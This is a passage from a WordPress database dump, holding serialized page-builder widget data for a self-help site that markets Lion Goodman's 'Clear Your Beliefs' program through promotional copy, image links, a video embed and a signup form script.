Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1095, 1585, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:554:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:872:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD the FREE iClearIt App</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:702:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, \nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1379:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>What You Can Accomplish with <em>Clear Your Beliefs</em></b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Finally release pain and hurts from the past</li>\n	<li>Clear resistance that stops you from taking action</li>\n	<li>Open yourself to new possibilities of love, work and success</li>\n	<li>Eliminate the blocks that prevent you from getting what you want</li>\n	<li>Find your true purpose and express your true magnificence</li>\n	<li>Permanently delete whatever’s been holding you back</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works</b>\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:476:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice. </p><p style="text-align: center;">Help your clients clear their beliefs so they can move their lives forward.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1097, 1587, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:554:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:872:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD the FREE iClearIt App</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:702:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, \nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1350:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>The <em>Clear Your Beliefs</em> Program can help you:</b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Finally release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Clear what stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works</b>\n<ul>\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The Clear Your Beliefs Program eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, and step-by-step, through the entire process.</li>\n	<li>Unlike other methods, the changes you make are permanent – the old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:476:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice. </p><p style="text-align: center;">Help your clients clear their beliefs so they can move their lives forward.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1098, 1588, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:554:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:872:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD the FREE iClearIt App</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:702:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, \nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1385:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>The <em>Clear Your Beliefs</em> Program can help you:</b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works So Well</b>\n<ul>\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2600:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are right or wrong, good or bad, or true or false.  They''re simply the tools we use to shape our reality.  Thus, the important questions are:  “What do I want to experience?", "What beliefs are creating the experiences I don''t like?"  and "What’s the best way to change my beliefs?”  \n\nThis is it.  I’ve created a method that clients and students have called “the magic wand of belief change.”\n\nI''m glad you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.   If you want to clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through 7 sessions of examining your beliefs, discovering what''s interfering with your life, then eliminating them, one by one. You’ll feel better, and function better. Life simply gets easier as the old stuff falls away.  The resistance and blocks that have held you back will just melt away ­­– like magic. For an even more effective journey, add coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\nDid I mention that it’s also a lot of fun? And easy?\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:476:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice. </p><p style="text-align: center;">Help your clients clear their beliefs so they can move their lives forward.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion 